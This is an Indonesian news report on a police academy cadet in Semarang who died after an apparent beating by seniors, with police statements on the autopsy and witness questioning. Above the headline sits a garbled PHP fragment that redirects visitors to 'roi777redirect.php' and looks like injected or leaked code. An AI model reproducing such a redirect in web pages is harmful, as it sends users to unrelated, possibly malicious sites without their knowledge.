header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Taruna Akpol Tewas tak Wajar -
Taruna Akpol Tewas tak Wajar

translampung.com – Brigadir Dua Taruna (Brigdatar) Mohammad Adam, Seorang taruna akademi kepolisian (Akpol) meninggal dunia pada dini hari tadi pukul 02.30 WIB. Diduga Mohammad Adam menjadi korban pengeroyokan dari seniornya.

Kabid Humas Polda Jawa Tengah Kombes Djarod Padakova membenarkan kejadian itu. Kini jasad korban masih dalam autopsi di Rumah Sakit Bhayangkara, Semarang, Jawa Tengah. “Benar, ada taruna akpol tingkat II meninggal dunia tadi pagi sekira jam 02.30,” kata dia kepada JawaPos.com, (grup translampung.com) Kamis (18/5).

Ketika itu, korban pingsan dan dibawa oleh rekannya ke Rumah Sakit Akpol. Pada pukul 02.30 WIB, korban dipastikan meninggal dunia. “Dari pemeriksan luar, korban didapati lebam di dada, di jari-jari juga sama biru gitu,” sambung Djarod.

Kemudian kini jadad kata dia dibawa ke Rumah Sakit Bhayangkara Semarang. Di sana jasad dilakukan autopsi. Djarod belum bisa memastikan kapan jenazah korban akan dibawa ke Jakarta, rumah orang tuanya. “Belum tahu ya, masih diautopsi jasadnya,” tambah dia.

Diketahui, pada pukul 08.00 WIB tadi penyidik reskrim Polda Jateng menuju lokasi untuk memeriksa lokasi. “Langsung olah TKP dan memeriksa 21 saksi. Sampai saat ini masih berlangsung di akpol untuk penyidikan,” tuturnya.

Untuk sementara, kata Djarod, penyidik baru mengantongi keterangan saksi. “Baru keterangan-keterangan ya kita dapat,” tukas dia. (elf/JPG/tnn)

News Reporter